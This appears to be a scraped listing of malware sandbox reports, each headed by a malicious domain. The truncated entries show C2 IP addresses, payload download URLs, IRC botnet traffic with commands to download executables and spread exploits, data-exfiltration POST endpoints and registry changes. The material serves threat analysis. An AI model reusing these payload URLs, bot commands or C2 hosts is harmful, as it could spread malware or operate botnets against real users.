tiffall.com 188.65.73.165 Download URLs http://188.65.73.165/nconfirm.php?rev=295&code=3¶m=0&num=18212908502016 (tiffall.com) Outgoing connection to remote server: tiffall.com TCP port 80DNS Lookup Host Name IP Address tiffall.com tiffall.com 188.65.73.165 ridgear.com ridgear.com 76.73.68.114 Download URLs http://188.65.73.165/njob.php?num=10277514037544684544&rev=295 (tiffall.com) http://188.65.73.165/nconfirm.php?rev=295&code=7¶m=0&num=18212908502016 (tiffall.com) http://188.65.73.165/nconfirm.php?rev=295&code=8¶m=0&num=18212908502016 (tiffall.com) http://76.73.68.114/up/new123/netprotocol.exe (ridgear.com) Outgoing connection to remote server: tiffall.com TCP port 80 Outgoing connection to remote server: ridgear.com TCP port 80DNS LookupRead more...
ms4oov.twoplayers.net
ms4oov.twoplayers.net 98.126.214.82 Remote Host Port Number 112.78.112.208 80 218.85.133.201 80 98.126.214.82 6789 PASS laorosr MODE #! -ix MODE #Ma -ix USER SP2-650 * 0 :COMPUTERNAME MODE [N00_USA_XP_9718720] @ -ix MODE #dpi -ix Joins channel: :#! #! :.asc-S|.http http://208.53.183.217/use13.exe|.asc exp_all 30 5 0 -a-r -e|.asc exp_all 30 5 0 -b -r-e|.asc exp_all30 5 0 -b|.asc exp_allRead more...
mypanelftp.co.cc
mypanelftp.co.cc mypanelftp.co.cc 91.215.170.45 Opened listening TCP connection on port: 27217Download URLs http://91.215.170.45/banner.tif (mypanelftp.co.cc) Data posted to URLs http://91.215.170.45/vorota.php (mypanelftp.co.cc) Outgoing connection to remote server: mypanelftp.co.cc TCP port 80 Outgoing connection to remote server: mypanelftp.co.cc TCP port 80 Outgoing connection to remote server: mypanelftp.co.cc TCP port 80 Outgoing connection to remote server: mypanelftp.co.cc TCP port 80Read more...
www.claudia-ferrer.com
www.claudia-ferrer.com 200.98.197.72 Download URLs http://200.98.197.72/site/javawhelper.jpg (www.claudia-ferrer.com) http://200.98.197.72/site/huntermails.jpg (www.claudia-ferrer.com) http://200.98.197.72/site/msgnlive.jpg (www.claudia-ferrer.com) Outgoing connection to remote server: www.claudia-ferrer.com TCP port 80 Outgoing connection to remote server: www.claudia-ferrer.com TCP port 80 Outgoing connection to remote server: www.claudia-ferrer.com TCP port 80 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{ECA9A748-EC22-4405-9F94-19CADCD27081} “” = HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{ECA9A748-EC22-4405-9F94-19CADCD27081}InprocServer32 “” = C:WINDOWSsystem32javawhelper.dll HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{ECA9A748-EC22-4405-9F94-19CADCD27081}InprocServer32 “ThreadingModel”Read more...
akgjsudim.com
akgjsudim.com 195.226.220.123 Data posted to URLs http://195.226.220.123/t0.php (akgjsudim.com) Outgoing connection to remote server: akgjsudim.com TCP port 80 Registry Changes by all processes Create or Open Changes Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS” HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey” HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext” HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionApp PathsIEXPLORE.EXE “” HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerSetup “IExploreLastModifiedLow” HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerSetup “IExploreLastModifiedHigh” HKEY_LOCAL_MACHINESOFTWAREClassesInterface{EAB22AC1-30C1-11CF-A7EB-0000C05BAE0B}TypeLib “” HKEY_LOCAL_MACHINESOFTWAREClassesInterface{B722BCCB-4E68-101B-A2BC-00AA00404770}ProxyStubClsid32 “” HKEY_LOCAL_MACHINESOFTWAREClassesInterface{79EAC9C4-BAF9-11CE-8C82-00AA004BA90B}ProxyStubClsid32 “” HKEY_LOCAL_MACHINESOFTWAREClassesInterface{000214E6-0000-0000-C000-000000000046}ProxyStubClsid32Read more...
alpha1.fortalezahost.com(IM worm)
205.234.138.152:2345 Nick: NEW-[AUT|00|P|88830] Username: XP-8003 Server Pass: xxx Joined Channel: #!gf! with Password test Channel Topic for Channel #!gf!: “d http://lmysapace.net/profile.php?=” Private Message to User NEW-[AUT|00|P|88830]: “.s.p http://domredi.com/1/” Channel Topic for Channel #!gf!: “D http://facellbook.net/profile.php?=” Private Message to User NEW-[AUT|00|P|01785]: “.s.p http://domredi.com/1/”
210.170.62.115(IM worm)
Remote Host Port Number 204.0.5.35 80 204.0.5.40 80 204.0.5.42 80 204.0.5.51 80 204.0.5.58 80 204.0.5.59 80 207.38.101.12 80 208.43.117.134 80 216.178.38.103 80 216.178.38.168 80 210.170.62.115 2345 PASS xxx NICK NEW-[USA|00|P|39876] USER XP-0115 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|39876] -ix JOIN #!gf! test PONG 22 MOTD * The data identified by the following URLs was then requestedRead more...
davidserverrat.no-ip.biz
davidserverrat.no-ip.biz 70.161.219.229 Outgoing connection to remote server: davidserverrat.no-ip.biz TCP port 5555
f19dd4abb8b8bdf2.cn
us.cnn.com 157.166.255.19 f19dd4abb8b8bdf2.cn 194.0.245.66 us.cnn.com 157.166.255.18 Download URLs http://157.166.255.19/ (us.cnn.com) http://157.166.255.18/ (us.cnn.com) Outgoing connection to remote server: us.cnn.com TCP port 80 Outgoing connection to remote server: f19dd4abb8b8bdf2.cn TCP port 80 Outgoing connection to remote server: f19dd4abb8b8bdf2.cn TCP port 80 Outgoing connection to remote server: us.cnn.com TCP port 80 Outgoing connection to remote server: f19dd4abb8b8bdf2.cn TCPRead more...
prmifgfgd.dnsdojo.org(banking malware)
prmifgfgd.dnsdojo.org 222.66.209.98 222.66.209.98 UDP Connections Remote IP Address: 127.0.0.1 Port: 1049 Send Datagram: 7 packet(s) of size 1 Recv Datagram: 7 packet(s) of size 1 Download URLs http://222.66.209.98/netanalyst/images/readme.txt (222.66.209.98) Data posted to URLs http://212.189.144.121/c/job.php () Outgoing connection to remote server: 212.189.144.121 TCP port 80 Outgoing connection to remote server: 222.66.209.98 TCP port 80 Registry ChangesRead more...